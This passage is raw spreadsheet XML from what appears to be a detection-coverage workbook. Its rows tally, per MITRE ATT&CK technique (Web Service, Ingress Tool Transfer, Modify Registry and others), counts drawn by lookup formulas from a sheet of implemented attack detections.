        <v>4</v>
      </c>
      <c r="AC23" s="16">
        <v>1</v>
      </c>
      <c r="AD23" s="394">
        <v>1</v>
      </c>
      <c r="AE23" s="392">
        <v>2</v>
      </c>
      <c r="AF23" s="392">
        <v>2</v>
      </c>
      <c r="AG23" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH23" s="392">
        <v>2</v>
      </c>
      <c r="AI23" s="16">
        <v>1</v>
      </c>
      <c r="AJ23" s="394">
        <v>1</v>
      </c>
      <c r="AK23" s="392">
        <v>15</v>
      </c>
      <c r="AL23" s="392">
        <v>6</v>
      </c>
      <c r="AM23" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (15)</v>
      </c>
      <c r="AN23" s="392">
        <v>6</v>
      </c>
      <c r="AO23" s="16">
        <v>1</v>
      </c>
      <c r="AP23" s="394">
        <v>1</v>
      </c>
      <c r="AQ23" s="292">
        <v>0</v>
      </c>
      <c r="AR23" s="322">
        <v>0</v>
      </c>
      <c r="AS23" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT23" s="12">
        <v>0</v>
      </c>
      <c r="AU23" s="13">
        <v>0</v>
      </c>
      <c r="AV23" s="394">
        <v>0</v>
      </c>
      <c r="AW23" s="392">
        <v>2</v>
      </c>
      <c r="AX23" s="392">
        <v>1</v>
      </c>
      <c r="AY23" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (2)</v>
      </c>
      <c r="AZ23" s="4">
        <v>1</v>
      </c>
      <c r="BA23" s="16">
        <v>1</v>
      </c>
      <c r="BB23" s="394">
        <v>1</v>
      </c>
      <c r="BC23" s="292">
        <v>3</v>
      </c>
      <c r="BD23" s="322">
        <v>2</v>
      </c>
      <c r="BE23" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (3)</v>
      </c>
      <c r="BF23" s="12">
        <v>2</v>
      </c>
      <c r="BG23" s="13">
        <v>1</v>
      </c>
      <c r="BH23" s="394">
        <v>1</v>
      </c>
      <c r="BI23" s="292">
        <v>3</v>
      </c>
      <c r="BJ23" s="322">
        <v>2</v>
      </c>
      <c r="BK23" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL23" s="12">
        <v>1</v>
      </c>
      <c r="BM23" s="13">
        <v>1</v>
      </c>
      <c r="BN23" s="394">
        <v>2</v>
      </c>
      <c r="BO23" s="292">
        <v>3</v>
      </c>
      <c r="BP23" s="322">
        <v>2</v>
      </c>
      <c r="BQ23" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (3)</v>
      </c>
      <c r="BR23" s="12">
        <v>1</v>
      </c>
      <c r="BS23" s="12">
        <v>0</v>
      </c>
      <c r="BT23" s="13">
        <v>1</v>
      </c>
      <c r="BU23" s="394">
        <v>2</v>
      </c>
      <c r="BV23" s="292">
        <v>2</v>
      </c>
      <c r="BW23" s="322">
        <v>2</v>
      </c>
      <c r="BX23" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY23" s="12">
        <v>1</v>
      </c>
      <c r="BZ23" s="13">
        <v>1</v>
      </c>
      <c r="CA23" s="394">
        <v>2</v>
      </c>
      <c r="CB23" s="292">
        <v>1</v>
      </c>
      <c r="CC23" s="322">
        <v>1</v>
      </c>
      <c r="CD23" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE23" s="12">
        <v>0</v>
      </c>
      <c r="CF23" s="12">
        <v>1</v>
      </c>
      <c r="CG23" s="13">
        <v>1</v>
      </c>
      <c r="CH23" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:86" ht="15" customHeight="1">
      <c r="A24" s="4">
        <f t="shared" si="13"/>
        <v>22</v>
      </c>
      <c r="B24" s="4" t="str">
        <f>IFERROR(VLOOKUP(A24,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1102</v>
      </c>
      <c r="C24" s="493" t="str">
        <f>IFERROR(VLOOKUP(B24,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Web Service</v>
      </c>
      <c r="D24" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B24)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E24" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F24" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G24" s="292">
        <v>0</v>
      </c>
      <c r="H24" s="322">
        <v>0</v>
      </c>
      <c r="I24" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J24" s="12">
        <v>0</v>
      </c>
      <c r="K24" s="13">
        <v>0</v>
      </c>
      <c r="L24" s="394">
        <v>0</v>
      </c>
      <c r="M24" s="322">
        <v>3</v>
      </c>
      <c r="N24" s="322">
        <v>3</v>
      </c>
      <c r="O24" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P24" s="12">
        <v>3</v>
      </c>
      <c r="Q24" s="13">
        <v>1</v>
      </c>
      <c r="R24" s="394">
        <v>1</v>
      </c>
      <c r="S24" s="409">
        <v>3</v>
      </c>
      <c r="T24" s="4">
        <v>3</v>
      </c>
      <c r="U24" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V24" s="4">
        <v>3</v>
      </c>
      <c r="W24" s="13">
        <v>1</v>
      </c>
      <c r="X24" s="394">
        <v>1</v>
      </c>
      <c r="Y24" s="392">
        <v>14</v>
      </c>
      <c r="Z24" s="392">
        <v>1</v>
      </c>
      <c r="AA24" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (14)</v>
      </c>
      <c r="AB24" s="392">
        <v>1</v>
      </c>
      <c r="AC24" s="16">
        <v>1</v>
      </c>
      <c r="AD24" s="394">
        <v>1</v>
      </c>
      <c r="AE24" s="392">
        <v>3</v>
      </c>
      <c r="AF24" s="392">
        <v>3</v>
      </c>
      <c r="AG24" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (3)</v>
      </c>
      <c r="AH24" s="392">
        <v>3</v>
      </c>
      <c r="AI24" s="16">
        <v>1</v>
      </c>
      <c r="AJ24" s="394">
        <v>1</v>
      </c>
      <c r="AK24" s="392">
        <v>17</v>
      </c>
      <c r="AL24" s="392">
        <v>4</v>
      </c>
      <c r="AM24" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (17)</v>
      </c>
      <c r="AN24" s="392">
        <v>4</v>
      </c>
      <c r="AO24" s="16">
        <v>1</v>
      </c>
      <c r="AP24" s="394">
        <v>1</v>
      </c>
      <c r="AQ24" s="292">
        <v>0</v>
      </c>
      <c r="AR24" s="322">
        <v>0</v>
      </c>
      <c r="AS24" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT24" s="12">
        <v>0</v>
      </c>
      <c r="AU24" s="13">
        <v>0</v>
      </c>
      <c r="AV24" s="394">
        <v>0</v>
      </c>
      <c r="AW24" s="392">
        <v>0</v>
      </c>
      <c r="AX24" s="392">
        <v>0</v>
      </c>
      <c r="AY24" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ24" s="4">
        <v>0</v>
      </c>
      <c r="BA24" s="16">
        <v>0</v>
      </c>
      <c r="BB24" s="394">
        <v>0</v>
      </c>
      <c r="BC24" s="292">
        <v>3</v>
      </c>
      <c r="BD24" s="322">
        <v>3</v>
      </c>
      <c r="BE24" s="322" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF24" s="12">
        <v>3</v>
      </c>
      <c r="BG24" s="13">
        <v>1</v>
      </c>
      <c r="BH24" s="394">
        <v>1</v>
      </c>
      <c r="BI24" s="292">
        <v>2</v>
      </c>
      <c r="BJ24" s="322">
        <v>1</v>
      </c>
      <c r="BK24" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL24" s="12">
        <v>1</v>
      </c>
      <c r="BM24" s="13">
        <v>1</v>
      </c>
      <c r="BN24" s="394">
        <v>1</v>
      </c>
      <c r="BO24" s="292">
        <v>4</v>
      </c>
      <c r="BP24" s="322">
        <v>3</v>
      </c>
      <c r="BQ24" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (4)</v>
      </c>
      <c r="BR24" s="12">
        <v>1</v>
      </c>
      <c r="BS24" s="12">
        <v>2</v>
      </c>
      <c r="BT24" s="13">
        <v>1</v>
      </c>
      <c r="BU24" s="394">
        <v>2</v>
      </c>
      <c r="BV24" s="292">
        <v>1</v>
      </c>
      <c r="BW24" s="322">
        <v>1</v>
      </c>
      <c r="BX24" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY24" s="12">
        <v>1</v>
      </c>
      <c r="BZ24" s="13">
        <v>1</v>
      </c>
      <c r="CA24" s="394">
        <v>1</v>
      </c>
      <c r="CB24" s="292">
        <v>5</v>
      </c>
      <c r="CC24" s="322">
        <v>1</v>
      </c>
      <c r="CD24" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (5)</v>
      </c>
      <c r="CE24" s="12">
        <v>0</v>
      </c>
      <c r="CF24" s="12">
        <v>1</v>
      </c>
      <c r="CG24" s="13">
        <v>1</v>
      </c>
      <c r="CH24" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:86" ht="15" customHeight="1">
      <c r="A25" s="4">
        <f t="shared" si="13"/>
        <v>23</v>
      </c>
      <c r="B25" s="4" t="str">
        <f>IFERROR(VLOOKUP(A25,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1104</v>
      </c>
      <c r="C25" s="493" t="str">
        <f>IFERROR(VLOOKUP(B25,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="D25" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B25)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E25" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F25" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G25" s="292">
        <v>0</v>
      </c>
      <c r="H25" s="322">
        <v>0</v>
      </c>
      <c r="I25" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J25" s="12">
        <v>0</v>
      </c>
      <c r="K25" s="13">
        <v>0</v>
      </c>
      <c r="L25" s="394">
        <v>0</v>
      </c>
      <c r="M25" s="322">
        <v>3</v>
      </c>
      <c r="N25" s="322">
        <v>3</v>
      </c>
      <c r="O25" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P25" s="12">
        <v>3</v>
      </c>
      <c r="Q25" s="13">
        <v>1</v>
      </c>
      <c r="R25" s="394">
        <v>1</v>
      </c>
      <c r="S25" s="409">
        <v>3</v>
      </c>
      <c r="T25" s="4">
        <v>3</v>
      </c>
      <c r="U25" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V25" s="4">
        <v>3</v>
      </c>
      <c r="W25" s="13">
        <v>1</v>
      </c>
      <c r="X25" s="394">
        <v>1</v>
      </c>
      <c r="Y25" s="392">
        <v>19</v>
      </c>
      <c r="Z25" s="392">
        <v>1</v>
      </c>
      <c r="AA25" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (19)</v>
      </c>
      <c r="AB25" s="392">
        <v>1</v>
      </c>
      <c r="AC25" s="16">
        <v>1</v>
      </c>
      <c r="AD25" s="394">
        <v>1</v>
      </c>
      <c r="AE25" s="392">
        <v>3</v>
      </c>
      <c r="AF25" s="392">
        <v>3</v>
      </c>
      <c r="AG25" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (3)</v>
      </c>
      <c r="AH25" s="392">
        <v>3</v>
      </c>
      <c r="AI25" s="16">
        <v>1</v>
      </c>
      <c r="AJ25" s="394">
        <v>1</v>
      </c>
      <c r="AK25" s="392">
        <v>22</v>
      </c>
      <c r="AL25" s="392">
        <v>4</v>
      </c>
      <c r="AM25" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (22)</v>
      </c>
      <c r="AN25" s="392">
        <v>4</v>
      </c>
      <c r="AO25" s="16">
        <v>1</v>
      </c>
      <c r="AP25" s="394">
        <v>1</v>
      </c>
      <c r="AQ25" s="292">
        <v>0</v>
      </c>
      <c r="AR25" s="322">
        <v>0</v>
      </c>
      <c r="AS25" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT25" s="12">
        <v>0</v>
      </c>
      <c r="AU25" s="13">
        <v>0</v>
      </c>
      <c r="AV25" s="394">
        <v>0</v>
      </c>
      <c r="AW25" s="392">
        <v>0</v>
      </c>
      <c r="AX25" s="392">
        <v>0</v>
      </c>
      <c r="AY25" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ25" s="4">
        <v>0</v>
      </c>
      <c r="BA25" s="16">
        <v>0</v>
      </c>
      <c r="BB25" s="394">
        <v>0</v>
      </c>
      <c r="BC25" s="292">
        <v>3</v>
      </c>
      <c r="BD25" s="322">
        <v>3</v>
      </c>
      <c r="BE25" s="322" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF25" s="12">
        <v>3</v>
      </c>
      <c r="BG25" s="13">
        <v>1</v>
      </c>
      <c r="BH25" s="394">
        <v>1</v>
      </c>
      <c r="BI25" s="292">
        <v>2</v>
      </c>
      <c r="BJ25" s="322">
        <v>1</v>
      </c>
      <c r="BK25" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL25" s="12">
        <v>1</v>
      </c>
      <c r="BM25" s="13">
        <v>1</v>
      </c>
      <c r="BN25" s="394">
        <v>1</v>
      </c>
      <c r="BO25" s="292">
        <v>3</v>
      </c>
      <c r="BP25" s="322">
        <v>2</v>
      </c>
      <c r="BQ25" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (3)</v>
      </c>
      <c r="BR25" s="12">
        <v>1</v>
      </c>
      <c r="BS25" s="12">
        <v>1</v>
      </c>
      <c r="BT25" s="13">
        <v>1</v>
      </c>
      <c r="BU25" s="394">
        <v>1</v>
      </c>
      <c r="BV25" s="292">
        <v>1</v>
      </c>
      <c r="BW25" s="322">
        <v>1</v>
      </c>
      <c r="BX25" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY25" s="12">
        <v>1</v>
      </c>
      <c r="BZ25" s="13">
        <v>1</v>
      </c>
      <c r="CA25" s="394">
        <v>1</v>
      </c>
      <c r="CB25" s="292">
        <v>5</v>
      </c>
      <c r="CC25" s="322">
        <v>1</v>
      </c>
      <c r="CD25" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (5)</v>
      </c>
      <c r="CE25" s="12">
        <v>0</v>
      </c>
      <c r="CF25" s="12">
        <v>1</v>
      </c>
      <c r="CG25" s="13">
        <v>1</v>
      </c>
      <c r="CH25" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:86" ht="15" customHeight="1">
      <c r="A26" s="4">
        <f t="shared" si="13"/>
        <v>24</v>
      </c>
      <c r="B26" s="4" t="str">
        <f>IFERROR(VLOOKUP(A26,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1105</v>
      </c>
      <c r="C26" s="493" t="str">
        <f>IFERROR(VLOOKUP(B26,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="D26" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B26)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E26" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F26" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (7)</v>
      </c>
      <c r="G26" s="292">
        <v>0</v>
      </c>
      <c r="H26" s="322">
        <v>0</v>
      </c>
      <c r="I26" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J26" s="12">
        <v>0</v>
      </c>
      <c r="K26" s="13">
        <v>0</v>
      </c>
      <c r="L26" s="394">
        <v>0</v>
      </c>
      <c r="M26" s="322">
        <v>3</v>
      </c>
      <c r="N26" s="322">
        <v>3</v>
      </c>
      <c r="O26" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P26" s="12">
        <v>1</v>
      </c>
      <c r="Q26" s="13">
        <v>1</v>
      </c>
      <c r="R26" s="394">
        <v>3</v>
      </c>
      <c r="S26" s="409">
        <v>3</v>
      </c>
      <c r="T26" s="4">
        <v>3</v>
      </c>
      <c r="U26" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V26" s="4">
        <v>1</v>
      </c>
      <c r="W26" s="13">
        <v>1</v>
      </c>
      <c r="X26" s="394">
        <v>3</v>
      </c>
      <c r="Y26" s="392">
        <v>0</v>
      </c>
      <c r="Z26" s="392">
        <v>0</v>
      </c>
      <c r="AA26" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB26" s="392">
        <v>0</v>
      </c>
      <c r="AC26" s="16">
        <v>0</v>
      </c>
      <c r="AD26" s="394">
        <v>0</v>
      </c>
      <c r="AE26" s="392">
        <v>4</v>
      </c>
      <c r="AF26" s="392">
        <v>4</v>
      </c>
      <c r="AG26" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (4)</v>
      </c>
      <c r="AH26" s="392">
        <v>2</v>
      </c>
      <c r="AI26" s="16">
        <v>1</v>
      </c>
      <c r="AJ26" s="394">
        <v>4</v>
      </c>
      <c r="AK26" s="392">
        <v>4</v>
      </c>
      <c r="AL26" s="392">
        <v>4</v>
      </c>
      <c r="AM26" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (4)</v>
      </c>
      <c r="AN26" s="392">
        <v>2</v>
      </c>
      <c r="AO26" s="16">
        <v>1</v>
      </c>
      <c r="AP26" s="394">
        <v>4</v>
      </c>
      <c r="AQ26" s="292">
        <v>0</v>
      </c>
      <c r="AR26" s="322">
        <v>0</v>
      </c>
      <c r="AS26" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT26" s="12">
        <v>0</v>
      </c>
      <c r="AU26" s="13">
        <v>0</v>
      </c>
      <c r="AV26" s="394">
        <v>0</v>
      </c>
      <c r="AW26" s="392">
        <v>0</v>
      </c>
      <c r="AX26" s="392">
        <v>0</v>
      </c>
      <c r="AY26" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ26" s="4">
        <v>0</v>
      </c>
      <c r="BA26" s="16">
        <v>0</v>
      </c>
      <c r="BB26" s="394">
        <v>0</v>
      </c>
      <c r="BC26" s="292">
        <v>3</v>
      </c>
      <c r="BD26" s="322">
        <v>3</v>
      </c>
      <c r="BE26" s="322" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF26" s="12">
        <v>1</v>
      </c>
      <c r="BG26" s="13">
        <v>1</v>
      </c>
      <c r="BH26" s="394">
        <v>3</v>
      </c>
      <c r="BI26" s="292">
        <v>1</v>
      </c>
      <c r="BJ26" s="322">
        <v>1</v>
      </c>
      <c r="BK26" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL26" s="12">
        <v>1</v>
      </c>
      <c r="BM26" s="13">
        <v>1</v>
      </c>
      <c r="BN26" s="394">
        <v>1</v>
      </c>
      <c r="BO26" s="292">
        <v>6</v>
      </c>
      <c r="BP26" s="322">
        <v>2</v>
      </c>
      <c r="BQ26" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (6)</v>
      </c>
      <c r="BR26" s="12">
        <v>1</v>
      </c>
      <c r="BS26" s="12">
        <v>1</v>
      </c>
      <c r="BT26" s="13">
        <v>1</v>
      </c>
      <c r="BU26" s="394">
        <v>2</v>
      </c>
      <c r="BV26" s="292">
        <v>2</v>
      </c>
      <c r="BW26" s="322">
        <v>2</v>
      </c>
      <c r="BX26" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY26" s="12">
        <v>1</v>
      </c>
      <c r="BZ26" s="13">
        <v>1</v>
      </c>
      <c r="CA26" s="394">
        <v>2</v>
      </c>
      <c r="CB26" s="292">
        <v>2</v>
      </c>
      <c r="CC26" s="322">
        <v>2</v>
      </c>
      <c r="CD26" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE26" s="12">
        <v>0</v>
      </c>
      <c r="CF26" s="12">
        <v>1</v>
      </c>
      <c r="CG26" s="13">
        <v>1</v>
      </c>
      <c r="CH26" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:86" ht="15" customHeight="1">
      <c r="A27" s="4">
        <f t="shared" si="13"/>
        <v>25</v>
      </c>
      <c r="B27" s="4" t="str">
        <f>IFERROR(VLOOKUP(A27,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1112</v>
      </c>
      <c r="C27" s="493" t="str">
        <f>IFERROR(VLOOKUP(B27,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Modify Registry</v>
      </c>
      <c r="D27" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B27)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E27" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>15</v>
      </c>
      <c r="F27" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (15)</v>
      </c>
      <c r="G27" s="292">
        <v>0</v>
      </c>
      <c r="H27" s="322">
        <v>0</v>
      </c>
      <c r="I27" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J27" s="12">
        <v>0</v>
      </c>
      <c r="K27" s="13">
        <v>0</v>
      </c>
      <c r="L27" s="394">
        <v>0</v>
      </c>
      <c r="M27" s="322">
        <v>0</v>
      </c>
      <c r="N27" s="322">
        <v>0</v>
      </c>
      <c r="O27" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P27" s="12">
        <v>0</v>
      </c>
      <c r="Q27" s="13">
        <v>0</v>
      </c>
      <c r="R27" s="394">
        <v>0</v>
      </c>
      <c r="S27" s="409">
        <v>0</v>
      </c>
      <c r="T27" s="4">
        <v>0</v>
      </c>
      <c r="U27" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V27" s="4">
        <v>0</v>
      </c>
      <c r="W27" s="13">
        <v>0</v>
      </c>
      <c r="X27" s="394">
        <v>0</v>
      </c>
      <c r="Y27" s="392">
        <v>1</v>
      </c>
      <c r="Z27" s="392">
        <v>1</v>
      </c>
      <c r="AA27" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB27" s="392">
        <v>1</v>
      </c>
      <c r="AC27" s="16">
        <v>1</v>
      </c>
      <c r="AD27" s="394">
        <v>1</v>
      </c>
      <c r="AE27" s="392">
        <v>0</v>
      </c>
      <c r="AF27" s="392">
        <v>0</v>
      </c>
      <c r="AG27" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH27" s="392">
        <v>0</v>
      </c>
      <c r="AI27" s="16">
        <v>0</v>
      </c>
      <c r="AJ27" s="394">
        <v>0</v>
      </c>
      <c r="AK27" s="392">
        <v>1</v>
      </c>
      <c r="AL27" s="392">
        <v>1</v>
      </c>
      <c r="AM27" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN27" s="392">
        <v>1</v>
      </c>
      <c r="AO27" s="16">
        <v>1</v>
      </c>
      <c r="AP27" s="394">
        <v>1</v>
      </c>
      <c r="AQ27" s="292">
        <v>0</v>
      </c>
      <c r="AR27" s="322">
        <v>0</v>
      </c>
      <c r="AS27" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT27" s="12">
        <v>0</v>
      </c>
      <c r="AU27" s="13">
        <v>0</v>
      </c>
      <c r="AV27" s="394">
        <v>0</v>
      </c>
      <c r="AW27" s="392">
        <v>0</v>
      </c>
      <c r="AX27" s="392">
        <v>0</v>
      </c>
      <c r="AY27" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ27" s="4">
        <v>0</v>
      </c>
      <c r="BA27" s="16">
        <v>0</v>
      </c>
      <c r="BB27" s="394">
        <v>0</v>
      </c>
      <c r="BC27" s="292">
        <v>0</v>
      </c>
      <c r="BD27" s="322">
        <v>0</v>
      </c>
      <c r="BE27" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF27" s="12">
        <v>0</v>
      </c>
      <c r="BG27" s="13">
        <v>0</v>
      </c>
      <c r="BH27" s="394">
        <v>0</v>
      </c>
      <c r="BI27" s="292">
        <v>0</v>
      </c>
      <c r="BJ27" s="322">
        <v>0</v>
      </c>
      <c r="BK27" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL27" s="12">
        <v>0</v>
      </c>
      <c r="BM27" s="13">
        <v>0</v>
      </c>
      <c r="BN27" s="394">
        <v>0</v>
      </c>
      <c r="BO27" s="292">
        <v>9</v>
      </c>
      <c r="BP27" s="322">
        <v>9</v>
      </c>
      <c r="BQ27" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (9)</v>
      </c>
      <c r="BR27" s="12">
        <v>0</v>
      </c>
      <c r="BS27" s="12">
        <v>5</v>
      </c>
      <c r="BT27" s="13">
        <v>1</v>
      </c>
      <c r="BU27" s="394">
        <v>8</v>
      </c>
      <c r="BV27" s="292">
        <v>0</v>
      </c>
      <c r="BW27" s="322">
        <v>0</v>
      </c>
      <c r="BX27" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY27" s="12">
        <v>0</v>
      </c>
      <c r="BZ27" s="13">
        <v>0</v>
      </c>
      <c r="CA27" s="394">
        <v>0</v>
      </c>
      <c r="CB27" s="292">
        <v>0</v>
      </c>
      <c r="CC27" s="322">
        <v>0</v>
      </c>
      <c r="CD27" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE27" s="12">
        <v>0</v>
      </c>
      <c r="CF27" s="12">
        <v>0</v>
      </c>
      <c r="CG27" s="13">
        <v>0</v>
      </c>
      <c r="CH27" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:86" ht="15" customHeight="1">
      <c r="A28" s="4">
        <f t="shared" si="13"/>
        <v>26</v>
      </c>
      <c r="B28" s="4" t="str">
        <f>IFERROR(VLOOKUP(A28,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1114</v>
      </c>
      <c r="C28" s="493" t="str">
        <f>IFERROR(VLOOKUP(B28,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Collection</v>
      </c>
      <c r="D28" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B28)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E28" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F28" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G28" s="292">
        <v>0</v>
      </c>
      <c r="H28" s="322">
        <v>0</v>
      </c>
      <c r="I28" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J28" s="12">
        <v>0</v>
      </c>
      <c r="K28" s="13">
        <v>0</v>
      </c>
      <c r="L28" s="394">
        <v>0</v>
      </c>
      <c r="M28" s="322">
        <v>0</v>
      </c>
      <c r="N28" s="322">
        <v>0</v>
      </c>
      <c r="O28" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
